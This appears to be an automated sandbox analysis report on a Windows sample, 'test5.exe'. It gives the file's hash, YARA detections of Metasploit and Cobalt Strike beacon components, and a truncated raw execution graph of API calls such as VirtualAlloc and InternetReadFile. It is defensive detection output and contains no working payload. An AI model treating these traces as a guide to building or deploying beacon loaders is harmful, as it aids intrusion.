                    Path:C:\Users\user\Desktop\test5.exe
                    Wow64 process (32bit):false
                    Commandline:"C:\Users\user\Desktop\test5.exe"
                    Imagebase:0x680000
                    File size:4'492'800 bytes
                    MD5 hash:AC76C4A995ACCB8A1D272CB76C4374EE
                    Has elevated privileges:true
                    Has administrator privileges:true
                    Programmed in:C, C++ or other language
                    Yara matches:
                    • Rule: JoeSecurity_MetasploitPayload_3, Description: Yara detected Metasploit Payload, Source: 00000000.00000002.2903666234.0000021551B00000.00000040.00001000.00020000.00000000.sdmp, Author: Joe Security
                    • Rule: JoeSecurity_CobaltStrike_3, Description: Yara detected CobaltStrike, Source: 00000000.00000002.2903666234.0000021551B00000.00000040.00001000.00020000.00000000.sdmp, Author: Joe Security
                    • Rule: Windows_Trojan_Metasploit_7bc0f998, Description: Identifies the API address lookup function leverage by metasploit shellcode, Source: 00000000.00000002.2903666234.0000021551B00000.00000040.00001000.00020000.00000000.sdmp, Author: unknown
                    • Rule: Windows_Trojan_Metasploit_c9773203, Description: Identifies the 64 bit API hashing function used by Metasploit. This has been re-used by many other malware families., Source: 00000000.00000002.2903666234.0000021551B00000.00000040.00001000.00020000.00000000.sdmp, Author: unknown
                    • Rule: JoeSecurity_CobaltStrike, Description: Yara detected CobaltStrike, Source: 00000000.00000002.2903805802.0000021553740000.00000040.00001000.00020000.00000000.sdmp, Author: Joe Security
                    • Rule: JoeSecurity_CobaltStrike_3, Description: Yara detected CobaltStrike, Source: 00000000.00000002.2903805802.0000021553740000.00000040.00001000.00020000.00000000.sdmp, Author: Joe Security
                    • Rule: Windows_Trojan_CobaltStrike_ee756db7, Description: Attempts to detect Cobalt Strike based on strings found in BEACON, Source: 00000000.00000002.2903805802.0000021553740000.00000040.00001000.00020000.00000000.sdmp, Author: unknown
                    • Rule: Windows_Trojan_CobaltStrike_663fc95d, Description: Identifies CobaltStrike via unidentified function code, Source: 00000000.00000002.2903805802.0000021553740000.00000040.00001000.00020000.00000000.sdmp, Author: unknown
                    • Rule: Windows_Trojan_CobaltStrike_b54b94ac, Description: Rule for beacon sleep obfuscation routine, Source: 00000000.00000002.2903805802.0000021553740000.00000040.00001000.00020000.00000000.sdmp, Author: unknown
                    • Rule: Windows_Trojan_CobaltStrike_f0b627fc, Description: Rule for beacon reflective loader, Source: 00000000.00000002.2903805802.0000021553740000.00000040.00001000.00020000.00000000.sdmp, Author: unknown
                    • Rule: Trojan_Raw_Generic_4, Description: unknown, Source: 00000000.00000002.2903805802.0000021553740000.00000040.00001000.00020000.00000000.sdmp, Author: unknown
                    • Rule: JoeSecurity_CobaltStrike, Description: Yara detected CobaltStrike, Source: 00000000.00000002.2903693694.0000021551BF0000.00000040.00001000.00020000.00000000.sdmp, Author: Joe Security
                    • Rule: JoeSecurity_CobaltStrike_3, Description: Yara detected CobaltStrike, Source: 00000000.00000002.2903693694.0000021551BF0000.00000040.00001000.00020000.00000000.sdmp, Author: Joe Security
                    • Rule: Windows_Trojan_CobaltStrike_ee756db7, Description: Attempts to detect Cobalt Strike based on strings found in BEACON, Source: 00000000.00000002.2903693694.0000021551BF0000.00000040.00001000.00020000.00000000.sdmp, Author: unknown
                    • Rule: Windows_Trojan_CobaltStrike_663fc95d, Description: Identifies CobaltStrike via unidentified function code, Source: 00000000.00000002.2903693694.0000021551BF0000.00000040.00001000.00020000.00000000.sdmp, Author: unknown
                    • Rule: Windows_Trojan_CobaltStrike_b54b94ac, Description: Rule for beacon sleep obfuscation routine, Source: 00000000.00000002.2903693694.0000021551BF0000.00000040.00001000.00020000.00000000.sdmp, Author: unknown
                    • Rule: Windows_Trojan_CobaltStrike_f0b627fc, Description: Rule for beacon reflective loader, Source: 00000000.00000002.2903693694.0000021551BF0000.00000040.00001000.00020000.00000000.sdmp, Author: unknown
                    • Rule: Trojan_Raw_Generic_4, Description: unknown, Source: 00000000.00000002.2903693694.0000021551BF0000.00000040.00001000.00020000.00000000.sdmp, Author: unknown
                    Reputation:low
                    Has exited:false

                    Reset < >

                      Execution Graph

                      Execution Coverage:1.3%
                      Dynamic/Decrypted Code Coverage:15.3%
                      Signature Coverage:18.1%
                      Total number of Nodes:943
                      Total number of Limit Nodes:82
                      execution_graph 75776 21551b00327 75777 21551b0037a VirtualAlloc 75776->75777 75779 21551b002e2 75776->75779 75778 21551b00383 InternetReadFile 75777->75778 75778->75779 75779->75776 75779->75777 75779->75778 75780 21551b003ac 75779->75780 75781 6e464c 75782 6e4655 75781->75782 75786 6e4600 75781->75786 75822 68d880 75782->75822 75785 6e9320 EnumCalendarInfoExW 75785->75786 75786->75781 75786->75785 75787 6e4bc5 75786->75787 75790 6e47aa 75786->75790 75795 6e49f5 75786->75795 75826 6929e0 EnumCalendarInfoExW 75787->75826 75789 6e47f6 75790->75789 75791 68d320 EnumCalendarInfoExW 75790->75791 75802 6e48df 75790->75802 75791->75802 75793 6e4ce5 75797 6e4d13 75793->75797 75829 68d680 EnumCalendarInfoExW 75793->75829 75794 6e4caf 75794->75793 75828 69dd60 EnumCalendarInfoExW 75794->75828 75795->75802 75811 68d320 75795->75811 75805 6e4df1 75797->75805 75830 68d5a0 EnumCalendarInfoExW 75797->75830 75800 6e4eae 75803 6e4f34 75800->75803 75833 696c20 EnumCalendarInfoExW 75800->75833 75802->75794 75827 691740 EnumCalendarInfoExW 75802->75827 75805->75800 75832 6d6100 EnumCalendarInfoExW 75805->75832 75806 6e4f25 75806->75803 75834 696d20 EnumCalendarInfoExW 75806->75834 75807 6e4d88 75807->75805 75831 691740 EnumCalendarInfoExW 75807->75831 75812 68d32a 75811->75812 75812->75811 75813 691980 EnumCalendarInfoExW 75812->75813 75815 68d3fd 75812->75815 75816 6b7ba0 EnumCalendarInfoExW 75812->75816 75817 6b8420 EnumCalendarInfoExW 75812->75817 75818 6b8160 EnumCalendarInfoExW 75812->75818 75819 6b7de0 EnumCalendarInfoExW 75812->75819 75820 6b7c00 EnumCalendarInfoExW 75812->75820 75821 6e9320 EnumCalendarInfoExW 75812->75821 75835 692780 75812->75835 75813->75812 75815->75802 75816->75812 75817->75812 75818->75812 75819->75812 75820->75812 75821->75812 75824 68d886 75822->75824 75823 6ee9a0 EnumCalendarInfoExW 75825 68d8ca 75823->75825 75824->75822 75824->75823 75826->75802 75827->75794 75828->75793 75829->75797 75830->75807 75831->75805 75832->75800 75833->75806 75834->75803 75841 69278a 75835->75841 75836 6e9320 EnumCalendarInfoExW 75836->75841 75838 6928e6 75859 69ef00 EnumCalendarInfoExW 75838->75859 75841->75835 75841->75836 75841->75838 75844 692ea0 75841->75844 75857 6af220 EnumCalendarInfoExW 75841->75857 75858 6af300 EnumCalendarInfoExW 75841->75858 75842 69292b 75842->75812 75847 692eaa 75844->75847 75847->75844 75848 693015 75847->75848 75850 6dc720 EnumCalendarInfoExW 75847->75850 75852 6aeda0 EnumCalendarInfoExW 75847->75852 75853 6a2360 EnumCalendarInfoExW 75847->75853 75854 6a1f00 EnumCalendarInfoExW 75847->75854 75860 6933e0 75847->75860 75864 6a3d00 EnumCalendarInfoExW 75847->75864 75865 6dc5a0 EnumCalendarInfoExW 75847->75865 75866 6e9320 EnumCalendarInfoExW 75847->75866 75867 691980 EnumCalendarInfoExW 75847->75867 75868 6aebe0 75847->75868 75848->75841 75850->75847 75852->75847 75853->75847 75854->75847 75857->75841 75858->75841 75859->75842 75861 6933ea 75860->75861 75861->75860 75881 6a5900 75861->75881 75863 693432 75863->75847 75864->75847 75865->75847 75866->75847 75867->75847 75870 6aebea 75868->75870 75870->75868 76086 6af0a0 EnumCalendarInfoExW 75870->76086 75871 6aed29 75871->75847 75873 6aec0a 75873->75871 75874 6aec6b 75873->75874 76087 68bf40 EnumCalendarInfoExW 75873->76087 76088 68bce0 75873->76088 75877 68d880 EnumCalendarInfoExW 75874->75877 75880 6aecad 75874->75880 75877->75880 75878 6aecfb 76101 68bf40 EnumCalendarInfoExW 75878->76101 76100 6af000 EnumCalendarInfoExW 75880->76100 75884 6a5906 75881->75884 75883 6a595b 75883->75863 75884->75881 75885 6ee9a0 75884->75885 75886 6ee9c1 75885->75886 75887 6ee9e9 75885->75887 75886->75887 75890 6c23a0 75886->75890 75896 6a59a0 75886->75896 75887->75883 75891 6c23a6 75890->75891 75891->75890 75902 6c2420 EnumCalendarInfoExW 75891->75902 75893 6c23c5 75903 6c6400 EnumCalendarInfoExW 75893->75903 75895 6c23e5 75895->75887 75897 6a59a6 75896->75897 75897->75896 75898 6a59e6 75897->75898 75940 6a5140 EnumCalendarInfoExW 75897->75940 75904 6a5dc0 75898->75904 75901 6a59fc 75901->75887 75902->75893 75903->75895 75917 6a5dcf 75904->75917 75905 68bce0 EnumCalendarInfoExW 75905->75917 75906 6a5f1d 75909 6a5fde 75906->75909 75977 6a5cc0 75906->75977 75907 6a9f60 EnumCalendarInfoExW 75907->75917 76003 68bf40 EnumCalendarInfoExW 75909->76003 75914 6a5f74 76002 68bf40 EnumCalendarInfoExW 75914->76002 75916 6a5f85 75916->75901 75917->75904 75917->75905 75917->75906 75917->75907 75917->75914 75923 6a5ed0 75917->75923 75941 6a66e0 75917->75941 76000 6ab5e0 EnumCalendarInfoExW 75917->76000 76001 68bf40 EnumCalendarInfoExW 75917->76001 76028 6e9320 EnumCalendarInfoExW 75917->76028 75918 6a61b6 75985 6a6400 75918->75985 75921 6a6205 75922 6a6258 75921->75922 75990 693b00 75921->75990 75925 6af160 EnumCalendarInfoExW 75922->75925 75923->75918 76004 6a0260 EnumCalendarInfoExW 75923->76004 75928 6a6274 75925->75928 75930 6a6295 75928->75930 75932 6af160 EnumCalendarInfoExW 75928->75932 76025 6af220 EnumCalendarInfoExW 75930->76025 75932->75930 75933 6a6167 75933->75918 76005 69a400 EnumCalendarInfoExW 75933->76005 75935 6a62a5 76026 6af300 EnumCalendarInfoExW 75935->76026 75937 6a6348 75937->75901 75938 6a6314 75938->75937 76027 6d5fa0 EnumCalendarInfoExW 75938->76027 75940->75898 75942 6a66ea 75941->75942 75942->75941 75951 6a6776 75942->75951 76029 68c980 75942->76029 75945 6af160 EnumCalendarInfoExW 75948 6a6929 75945->75948 75946 6a685c 76056 6b7ba0 EnumCalendarInfoExW 75946->76056 76063 6af220 EnumCalendarInfoExW 75948->76063 75949 6a6885 76057 6b8420 EnumCalendarInfoExW 75949->76057 75951->75945 75952 6a675f 75952->75951 75955 6af160 EnumCalendarInfoExW 75952->75955 75954 6a6935 76064 6af300 EnumCalendarInfoExW 75954->76064 75958 6a67c6 75955->75958 75956 6a6896 76058 6b8160 EnumCalendarInfoExW 75956->76058 76054 6af220 EnumCalendarInfoExW 75958->76054 75960 6a694c 76045 6a8400 75960->76045 75962 6a68a5 76059 6b8420 EnumCalendarInfoExW 75962->76059 75964 6a67d2 76055 6af300 EnumCalendarInfoExW 75964->76055 75966 6a6965 75966->75917 75968 6a68b6 76060 6b8160 EnumCalendarInfoExW 75968->76060 75969 6a67e9 75971 6a8400 EnumCalendarInfoExW 75969->75971 75971->75951 75972 6a68c8 76061 6b8420 EnumCalendarInfoExW 75972->76061 75974 6a68d9 76062 6b7c00 EnumCalendarInfoExW 75974->76062 75976 6a68de 75976->75917 75979 6a5cca 75977->75979 75978 6a5cfd 76065 696800 75978->76065 75979->75977 75979->75978 75983 6a5ce5 75979->75983 75981 6a5d08 75981->75909 75982 6a5d29 75982->75909 75983->75982 75984 696800 EnumCalendarInfoExW 75983->75984 75984->75983 75987 6a640a 75985->75987 75987->75985 75988 6a660b 75987->75988 75989 6b42a0 EnumCalendarInfoExW 75987->75989 76077 6a5b60 EnumCalendarInfoExW 75987->76077 75988->75921 75989->75987 75996 693b0a 75990->75996 75991 693b73 76006 6af160 75991->76006 75992 6b2fc0 EnumCalendarInfoExW 75992->75996 75993 6b7ba0 EnumCalendarInfoExW 75993->75996 75994 6b8160 EnumCalendarInfoExW 75994->75996 75995 6b8420 EnumCalendarInfoExW 75995->75996 75996->75990 75996->75991 75996->75992 75996->75993 75996->75994 75996->75995 75997 6b7de0 EnumCalendarInfoExW 75996->75997 75998 6b7c00 EnumCalendarInfoExW 75996->75998 75999 6e9320 EnumCalendarInfoExW 75996->75999 75997->75996 75998->75996 75999->75996 76000->75917 76001->75917 76002->75916 76003->75923 76004->75933 76005->75918 76007 6af185 76006->76007 76008 6af198 76007->76008 76078 6b7ba0 EnumCalendarInfoExW 76007->76078 76008->75922 76010 6af1a5 76079 6b8420 EnumCalendarInfoExW 76010->76079 76012 6af1b6 76080 6b8160 EnumCalendarInfoExW 76012->76080 76014 6af1c5 76081 6b8420 EnumCalendarInfoExW 76014->76081 76016 6af1d6 76082 6b8240 EnumCalendarInfoExW 76016->76082 76018 6af1e5 76083 6b7de0 EnumCalendarInfoExW 76018->76083 76020 6af1ea 76084 6b7c00 EnumCalendarInfoExW 76020->76084 76022 6af1ef 76085 6e9320 EnumCalendarInfoExW 76022->76085 76024 6af205 76025->75935 76026->75938 76027->75937 76028->75917 76030 68c98f 76029->76030 76030->76029 76031 693e40 EnumCalendarInfoExW 76030->76031 76032 68d140 EnumCalendarInfoExW 76030->76032 76033 693d60 EnumCalendarInfoExW 76030->76033 76034 696800 EnumCalendarInfoExW 76030->76034 76035 6b7ba0 EnumCalendarInfoExW 76030->76035 76036 6b2fc0 EnumCalendarInfoExW 76030->76036 76037 6b8420 EnumCalendarInfoExW 76030->76037 76038 68dc20 EnumCalendarInfoExW 76030->76038 76039 6e9320 EnumCalendarInfoExW 76030->76039 76040 68d880 EnumCalendarInfoExW 76030->76040 76041 6b82a0 EnumCalendarInfoExW 76030->76041 76042 68ccd9 76030->76042 76043 6b7de0 EnumCalendarInfoExW 76030->76043 76044 6b7c00 EnumCalendarInfoExW 76030->76044 76031->76030 76032->76030 76033->76030 76034->76030 76035->76030 76036->76030 76037->76030 76038->76030 76039->76030 76040->76030 76041->76030 76042->75946 76042->75952 76043->76030 76044->76030 76053 6a840a 76045->76053 76046 6aa880 EnumCalendarInfoExW 76046->76053 76047 6a0fa0 EnumCalendarInfoExW 76047->76053 76048 6ae1e0 EnumCalendarInfoExW 76048->76053 76049 6ae5c0 EnumCalendarInfoExW 76049->76053 76050 6a862c 76050->75966 76051 693840 EnumCalendarInfoExW 76051->76053 76052 6e9320 EnumCalendarInfoExW 76052->76053 76053->76045 76053->76046 76053->76047 76053->76048 76053->76049 76053->76050 76053->76051 76053->76052 76054->75964 76055->75969 76056->75949 76057->75956 76058->75962 76059->75968 76060->75972 76061->75974 76062->75976 76063->75954 76064->75960 76069 69680a 76065->76069 76066 69681e 76068 696827 76066->76068 76070 696877 76066->76070 76072 68d880 EnumCalendarInfoExW 76066->76072 76067 6b7ba0 EnumCalendarInfoExW 76067->76069 76068->75981 76069->76065 76069->76066 76069->76067 76071 6b8420 EnumCalendarInfoExW 76069->76071 76074 6b7c00 EnumCalendarInfoExW 76069->76074 76075 6e9320 EnumCalendarInfoExW 76069->76075 76073 6968a7 76070->76073 76076 6a4d24 EnumCalendarInfoExW 76070->76076 76071->76069 76072->76070 76073->75981 76074->76069 76075->76069 76076->76073 76077->75987 76078->76010 76079->76012 76080->76014 76081->76016 76082->76018 76083->76020 76084->76022 76085->76024 76086->75873 76087->75873 76090 68bcea 76088->76090 76089 68bd08 76092 68bd8d 76089->76092 76102 6b22e0 EnumCalendarInfoExW 76089->76102 76090->76088 76090->76089 76105 6e9320 EnumCalendarInfoExW 76090->76105 76092->75873 76094 68bd39 76103 6ad2c0 EnumCalendarInfoExW 76094->76103 76096 68be36 76096->75873 76097 6ee9a0 EnumCalendarInfoExW 76098 68bd65 76097->76098 76098->76096 76098->76097 76104 6b1fa0 EnumCalendarInfoExW 76098->76104 76100->75878 76101->75871 76102->76094 76103->76098 76104->76098 76105->76090 76106 21553756eeb 76107 21553756f78 76106->76107 76110 215537579eb 76107->76110 76109 21553757018 76113 21553757a25 76110->76113 76111 21553757b1c VirtualAlloc 76112 21553757b40 76111->76112 76112->76109 76113->76111 76113->76112 76114 69332d 76115 693340 76114->76115 76116 69336c 76115->76116 76117 693352 76115->76117 76119 6aebe0 EnumCalendarInfoExW 76116->76119 76118 6aebe0 EnumCalendarInfoExW 76117->76118 76120 69336a 76118->76120 76119->76120 76121 21551c0f9fc 76122 21551c0fa18 _DllMainCRTStartup 76121->76122 76127 21551c0faa8 76122->76127 76131 21551c0fa72 76122->76131 76133 21551c0f89c RtlFreeHeap 12 library calls 76122->76133 76126 21551c0faef 76126->76131 76141 21551c0f89c RtlFreeHeap 12 library calls 76126->76141 76127->76131 76134 21551c079cc 76127->76134 76128 21551c079cc _DllMainCRTStartup 9 API calls 76130 21551c0fae2 76128->76130 76140 21551c0f89c RtlFreeHeap 12 library calls 76130->76140 76133->76127 76135 21551c07a8d 76134->76135 76139 21551c079ee _DllMainCRTStartup 76134->76139 76186 21551c09a44 76135->76186 76137 21551c07a8b 76137->76126 76137->76128 76139->76137 76142 21551bfca74 76139->76142 76140->76126 76141->76131 76198 21551c0473c 76142->76198 76144 21551bfca92 _DllMainCRTStartup 76205 21551c0d1c8 76144->76205 76146 21551bfcb23 _DllMainCRTStartup 76216 21551c0ca38 76146->76216 76148 21551bfcb81 76149 21551c0ca38 _DllMainCRTStartup RtlFreeHeap 76148->76149 76150 21551bfcb9b _DllMainCRTStartup 76149->76150 76152 21551bfcba9 _DllMainCRTStartup 76150->76152 76249 21551c0ba2c RtlFreeHeap _DllMainCRTStartup 76150->76249 76153 21551bfcbc5 76152->76153 76250 21551c0ba2c RtlFreeHeap _DllMainCRTStartup 76152->76250 76223 21551bfee30 76153->76223 76157 21551bfcbda 76229 21551bfeeac 76157->76229 76162 21551bfcbe8 76163 21551c0d1c8 malloc RtlFreeHeap 76162->76163 76164 21551bfcc15 76163->76164 76165 21551bfcc22 76164->76165 76253 21551c0ba2c RtlFreeHeap _DllMainCRTStartup 76164->76253 76167 21551c0ca38 _DllMainCRTStartup RtlFreeHeap 76165->76167 76168 21551bfcc3f 76167->76168 76239 21551c043b0 76168->76239 76187 21551c0473c _DllMainCRTStartup RtlFreeHeap 76186->76187 76188 21551c09a68 _wctomb_s_l _DllMainCRTStartup 76187->76188 76189 21551c0d1c8 malloc RtlFreeHeap 76188->76189 76190 21551c09af5 _wctomb_s_l 76189->76190 76191 21551c0ca38 _DllMainCRTStartup RtlFreeHeap 76190->76191 76192 21551c09b26 _DllMainCRTStartup 76191->76192 76194 21551c09b3d GetPdbDllFromInstallPath _DllMainCRTStartup 76192->76194 76292 21551bfec4c 76192->76292 76195 21551c09dca _wctomb_s_l _DllMainCRTStartup 76194->76195 76196 21551c0d1c8 malloc RtlFreeHeap 76194->76196 76197 21551c0ca38 _DllMainCRTStartup RtlFreeHeap 76194->76197 76195->76137 76196->76194 76197->76194 76199 21551c0d1c8 malloc RtlFreeHeap 76198->76199 76200 21551c0475d 76199->76200 76201 21551c0d1c8 malloc RtlFreeHeap 76200->76201 76204 21551c04765 _wctomb_s_l _DllMainCRTStartup 76200->76204 76202 21551c04771 76201->76202 76202->76204 76254 21551c0d188 76202->76254 76204->76144 76206 21551c0d25c _callnewh 76205->76206 76213 21551c0d1e0 _callnewh _mtinitlocknum 76205->76213 76261 21551c0fbcc RtlFreeHeap _getptd_noexit 76206->76261 76210 21551c0d251 76210->76146 76211 21551c0d241 76259 21551c0fbcc RtlFreeHeap _getptd_noexit 76211->76259 76213->76210 76213->76211 76214 21551c0d246 76213->76214 76257 21551c0fca4 RtlFreeHeap _NMSG_WRITE _set_error_mode 76213->76257 76258 21551c0fd18 RtlFreeHeap 7 library calls 76213->76258 76260 21551c0fbcc RtlFreeHeap _getptd_noexit 76214->76260 76217 21551c0ca77 76216->76217 76218 21551c0ca8d _wctomb_s_l 76216->76218 76219 21551c0ca8f 76217->76219 76220 21551c0ca83 76217->76220 76218->76148 76262 21551c0f7c8 RtlFreeHeap _callnewh _errno free malloc 76219->76262 76221 21551c0d1c8 malloc RtlFreeHeap 76220->76221 76221->76218 76225 21551bfee46 76223->76225 76224 21551bfcbd1 76224->76157 76251 21551c0ba2c RtlFreeHeap _DllMainCRTStartup 76224->76251 76225->76224 76225->76225 76263 21551c08eac RtlFreeHeap _DllMainCRTStartup 76225->76263 76227 21551bfee80 76264 21551c08ee4 RtlFreeHeap _snprintf _DllMainCRTStartup 76227->76264 76231 21551bfeed1 76229->76231 76230 21551bfcbdf 76230->76162 76252 21551c0ba2c RtlFreeHeap _DllMainCRTStartup 76230->76252 76231->76230 76232 21551c0d1c8 malloc RtlFreeHeap 76231->76232 76233 21551bfef4d GetPdbDllFromInstallPath _DllMainCRTStartup 76232->76233 76234 21551bfefa3 _wctomb_s_l 76233->76234 76265 21551c08eac RtlFreeHeap _DllMainCRTStartup 76233->76265 76237 21551c0d188 free RtlFreeHeap 76234->76237 76236 21551bfef84 76266 21551c08ee4 RtlFreeHeap _snprintf _DllMainCRTStartup 76236->76266 76237->76230 76240 21551c043ce _DllMainCRTStartup 76239->76240 76267 21551c09684 RtlFreeHeap _DllMainCRTStartup 76240->76267 76242 21551c043f8 76268 21551c0e38c RtlFreeHeap _getptd 76242->76268 76244 21551c0440f _DllMainCRTStartup 76269 21551c04578 76244->76269 76246 21551c044e4 GetPdbDllFromInstallPath _wctomb_s_l _DllMainCRTStartup 76278 21551c0919c RtlFreeHeap GetPdbDllFromInstallPath _DllMainCRTStartup 76246->76278 76248 21551c04545 76255 21551c0d18d RtlFreeHeap 76254->76255 76256 21551c0d1a8 _errno free 76254->76256 76255->76256 76256->76204 76257->76213 76258->76213 76259->76214 76260->76210 76261->76210 76262->76218 76263->76227 76264->76224 76265->76236 76266->76234 76267->76242 76268->76244 76270 21551c0473c _DllMainCRTStartup RtlFreeHeap 76269->76270 76271 21551c045a1 _DllMainCRTStartup 76270->76271 76272 21551c045ef GetUserNameA 76271->76272 76273 21551c04618 76272->76273 76279 21551bfec40 WSASocketA WSAIoctl _DllMainCRTStartup 76273->76279 76275 21551c0461d strrchr _DllMainCRTStartup 76280 21551c0d57c 76275->76280 76277 21551c046f0 _DllMainCRTStartup 76277->76246 76278->76248 76279->76275 76283 21551c0d5ae _wctomb_s_l 76280->76283 76281 21551c0d5b3 76289 21551c0fbcc RtlFreeHeap _getptd_noexit 76281->76289 76283->76281 76284 21551c0d5d2 76283->76284 76290 21551c103dc RtlFreeHeap 12 library calls 76284->76290 76286 21551c0d602 76287 21551c0d5b8 _invalid_parameter_noinfo 76286->76287 76291 21551c10250 RtlFreeHeap 7 library calls 76286->76291 76287->76277 76289->76287 76290->76286 76291->76287 76297 21551bfed50 76292->76297 76294 21551bfec67 WSASocketA 76295 21551bfec90 WSAIoctl 76294->76295 76296 21551bfec89 76294->76296 76295->76296 76296->76194 76298 21551bfed64 76297->76298 76298->76294 76299 6a806d 76300 6a7dc0 76299->76300 76301 68bce0 EnumCalendarInfoExW 76300->76301 76302 6a7e65 76301->76302 76307 6a8180 76302->76307 76306 6a7ff6 76311 6a818a 76307->76311 76308 6a7ee5 76315 68bf40 EnumCalendarInfoExW 76308->76315 76311->76307 76311->76308 76312 6a81e5 76311->76312 76316 693840 76311->76316 76321 68bf40 EnumCalendarInfoExW 76311->76321 76322 6e9320 EnumCalendarInfoExW 76311->76322 76313 68bce0 EnumCalendarInfoExW 76312->76313 76313->76308 76315->76306 76317 6af160 EnumCalendarInfoExW 76316->76317 76318 69385b 76317->76318 76323 6b2fc0 76318->76323 76321->76311 76322->76311 76326 6b2d60 76323->76326 76327 6b2d7c 76326->76327 76330 6f05a0 76327->76330 76329 6938a5 76329->76311 76331 6f0627 76330->76331 76332 6f05c5 76330->76332 76333 6f0580 EnumCalendarInfoExW 76331->76333 76332->76331 76334 6f05da 76332->76334 76335 6f0641 76333->76335 76338 6f0580 76334->76338 76335->76329 76341 6f2140 76338->76341 76339 6f058d 76339->76329 76343 6f2160 EnumCalendarInfoExW 76341->76343 76343->76339 76344 68d920 76347 68d926 76344->76347 76346 68d948 76347->76344 76348 68d960 76347->76348 76351 68d96a 76348->76351 76349 6e9320 EnumCalendarInfoExW 76349->76351 76350 68d9a5 76352 68da7b 76350->76352 76353 68d9b6 76350->76353 76351->76348 76351->76349 76351->76350 76354 693840 EnumCalendarInfoExW 76352->76354 76356 68d9ea 76353->76356 76357 68bce0 EnumCalendarInfoExW 76353->76357 76355 68da85 76354->76355 76355->76346 76358 693840 EnumCalendarInfoExW 76356->76358 76362 68da76 76356->76362 76357->76356 76359 68da65 76358->76359 76359->76362 76363 68db90 76359->76363 76360 68dae9 76361 68db25 76360->76361 76365 6af160 EnumCalendarInfoExW 76360->76365 76361->76346 76362->76360 76362->76362 76370 68bf40 EnumCalendarInfoExW 76362->76370 76371 6e9320 EnumCalendarInfoExW 76363->76371 76372 68bf40 EnumCalendarInfoExW 76363->76372 76368 68db10 76365->76368 76369 6af160 EnumCalendarInfoExW 76368->76369 76369->76361 76370->76360 76371->76363 76372->76363 76373 6b9820 76392 6b982a 76373->76392 76389 68bce0 EnumCalendarInfoExW 76389->76392 76392->76373 76392->76389 76393 6b9b0e 76392->76393 76397 68c600 76392->76397 76412 681ac0 76392->76412 76418 6b9cc0 76392->76418 76432 6b1820 76392->76432 76445 6c86c0 76392->76445 76459 6c7c60 EnumCalendarInfoExW 76392->76459 76460 6eb020 EnumCalendarInfoExW 76392->76460 76461 6c7760 EnumCalendarInfoExW 76392->76461 76462 684d40 EnumCalendarInfoExW 76392->76462 76463 6d1a80 EnumCalendarInfoExW 76392->76463 76464 6e0160 EnumCalendarInfoExW 76392->76464 76465 68ad40 EnumCalendarInfoExW 76392->76465 76466 6cfda0 EnumCalendarInfoExW 76392->76466 76467 696940 EnumCalendarInfoExW 76392->76467 76468 6cd0c0 76392->76468 76482 688280 EnumCalendarInfoExW 76392->76482 76483 6c3860 EnumCalendarInfoExW 76392->76483 76485 6e9320 EnumCalendarInfoExW 76392->76485 76484 68bf40 EnumCalendarInfoExW 76393->76484 76396 6b9b1c 76399 68c60a 76397->76399 76398 6b7ba0 EnumCalendarInfoExW 76398->76399 76399->76397 76399->76398 76400 6b8160 EnumCalendarInfoExW 76399->76400 76401 6b8420 EnumCalendarInfoExW 76399->76401 76402 68c6cb 76399->76402 76405 6b8240 EnumCalendarInfoExW 76399->76405 76407 6b7c00 EnumCalendarInfoExW 76399->76407 76408 6e9320 EnumCalendarInfoExW 76399->76408 76400->76399 76401->76399 76486 6a4fa0 76402->76486 76405->76399 76407->76399 76408->76399 76409 68c762 76409->76392 76410 68c6dc 76410->76409 76411 696800 EnumCalendarInfoExW 76410->76411 76411->76410 76413 681ac6 76412->76413 76413->76412 76556 682060 76413->76556 76415 681add 76564 681b20 EnumCalendarInfoExW 76415->76564 76417 681aec 76417->76392 76419 6b9cca 76418->76419 76419->76418 76420 6b9d05 76419->76420 76568 6ed3a0 EnumCalendarInfoExW 76419->76568 76422 68bce0 EnumCalendarInfoExW 76420->76422 76423 6b9d13 76422->76423 76424 6b9d1d 76423->76424 76569 6b9c60 EnumCalendarInfoExW 76423->76569 76570 6c7b80 EnumCalendarInfoExW 76424->76570 76427 6b9d45 76428 6b9da5 76427->76428 76571 6e3e00 EnumCalendarInfoExW 76427->76571 76572 68bf40 EnumCalendarInfoExW 76428->76572 76431 6b9dc5 76431->76392 76434 6b182a 76432->76434 76433 6b2d60 EnumCalendarInfoExW 76433->76434 76434->76432 76434->76433 76435 6b197c 76434->76435 76444 6b1a2b 76434->76444 76585 6b2e40 76435->76585 76439 6b19cf 76589 6b2ec0 76439->76589 76443 6b1a05 76443->76392 76444->76392 76447 6c86ca 76445->76447 76447->76445 76597 688280 EnumCalendarInfoExW 76447->76597 76448 6c870b 76598 6e3e80 EnumCalendarInfoExW 76448->76598 76451 6c8765 76599 6c89c0 EnumCalendarInfoExW 76451->76599 76452 6c87be 76600 6c89c0 EnumCalendarInfoExW 76452->76600 76454 6c87cf 76601 688280 EnumCalendarInfoExW 76454->76601 76456 6c880f 76602 6e9da0 EnumCalendarInfoExW 76456->76602 76458 6c8814 76458->76392 76459->76392 76460->76392 76461->76392 76462->76392 76463->76392 76464->76392 76465->76392 76466->76392 76467->76392 76479 6cd0ca 76468->76479 76469 6e9320 EnumCalendarInfoExW 76469->76479 76470 693840 EnumCalendarInfoExW 76470->76479 76471 6cd153 76471->76392 76472 68bce0 EnumCalendarInfoExW 76472->76479 76476 68bf40 EnumCalendarInfoExW 76476->76479 76478 6cd26d 76478->76392 76479->76468 76479->76469 76479->76470 76479->76471 76479->76472 76479->76476 76480 6cd21b 76479->76480 76603 6a5a20 76479->76603 76609 6a6ec0 EnumCalendarInfoExW 76479->76609 76611 6cca40 EnumCalendarInfoExW 76479->76611 76612 6ccd80 EnumCalendarInfoExW 76479->76612 76480->76478 76610 6d6280 EnumCalendarInfoExW 76480->76610 76482->76392 76483->76392 76484->76396 76485->76392 76487 6a4faa 76486->76487 76487->76486 76522 6966e0 EnumCalendarInfoExW 76487->76522 76489 6a4fde 76523 6966e0 EnumCalendarInfoExW 76489->76523 76491 6a5005 76524 6966e0 EnumCalendarInfoExW 76491->76524 76493 6a5029 76525 6966e0 EnumCalendarInfoExW 76493->76525 76495 6a504d 76526 6966e0 EnumCalendarInfoExW 76495->76526 76497 6a5071 76527 6966e0 EnumCalendarInfoExW 76497->76527 76499 6a5095 76528 6966e0 EnumCalendarInfoExW 76499->76528 76501 6a50b9 76529 6966e0 EnumCalendarInfoExW 76501->76529 76503 6a50dd 76507 6a8240 76503->76507 76506 692640 EnumCalendarInfoExW 76506->76410 76510 6a824a 76507->76510 76508 6a826a 76530 6ae340 76508->76530 76509 6b7ba0 EnumCalendarInfoExW 76509->76510 76510->76507 76510->76508 76510->76509 76512 6b8420 EnumCalendarInfoExW 76510->76512 76518 6b8240 